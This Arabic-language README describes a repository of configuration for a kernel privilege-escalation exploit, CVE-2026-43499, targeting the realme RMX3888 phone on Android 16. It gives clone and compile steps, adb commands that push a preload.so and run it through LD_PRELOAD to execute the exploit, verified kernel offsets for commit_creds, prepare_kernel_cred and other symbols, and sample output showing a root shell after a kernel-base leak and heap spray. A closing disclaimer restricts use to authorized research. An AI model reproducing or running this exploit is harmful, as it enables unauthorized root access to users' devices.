
إعدادات استغلال CVE-2026-43499 لجهاز realme RMX3888 (أندرويد 16) - 20 إزاحة نواة مُوثَّقة
يحتوي هذا المستودع على ملفات الإعداد الكاملة لاستغلال CVE-2026-43499 (GhostLock) الموجه لجهاز realme RMX3888. تم استخراج جميع إزاحات النواة والتحقق منها من ملف boot.img الخاص بالجهاز.
✓ 20 إزاحة نواة موثقة مستخرجة من vmlinux
✓ تسجيل لحظي مع O_SYNC + fsync لضمان السلامة عند انهيار النواة
✓ إعداد مخصص للجهاز لطراز RMX3888
✓ سكربت تجميع بنقرة واحدة مع كشف تلقائي لـ NDK
✓ توثيق شامل مع أدلة بناء
ealtime_log.h - تنفيذ التسجيل اللحظي
ound2_report.md - تقرير الإعداد (الجولة 2)
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
في بيئة Git Bash على ويندوز، يكتشف السكربت تلقائيًا مسار SDK الافتراضي المستخدم بواسطة Android Studio وأدوات سطر الأوامر: /c/Android/Sdk/ndk/*.
ملاحظة: تستخدم ASHMEM_MISC_FOPS وASHMEM_COMPAT_IOCTL وCOPY_SPLICE_READ حاليًا قيمًا احتياطية متوافقة مع البناء في ملف الترويسة الخاص بجهاز RMX3888. استبدل هذه القيم بإزاحات RMX3888 الموثقة من vmlinux قبل الاعتماد على سلوك وقت التشغيل.
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
الإزاحات الرئيسية أدناه مستخرجة من النواة 6.1.141. راجع الملاحظة أعلاه بخصوص القيم الاحتياطية المتوافقة مع البناء التي ما تزال بحاجة إلى تحقق خاص بجهاز RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
توفر وحدة التسجيل اللحظي المدمجة ما يلي:
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
راجع BUILD_GUIDE.md للحصول على تعليمات تفصيلية لاستكشاف الأخطاء وإصلاحها، بما في ذلك:
⚠️ تحذير: هذا الإعداد مخصص لأغراض البحث الأمني المصرح به فقط.
يتم توفير هذا الإعداد لأغراض تعليمية وبحث أمني فقط.
يحتوي هذا المستودع على مواد بحث أمني. لا يتحمل المؤلفون والمساهمون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود. استخدمه على مسؤوليتك الخاصة وفقط على الأجهزة التي تملكها أو لديك إذن صريح لاختبارها.
تاريخ الإنشاء: 2026-07-23
إصدار النواة: 6.1.141-android14-11-o-gffc54a6d2287
التحقق من الإزاحات: 100% (20/20)
الحالة: جاهز للتجميع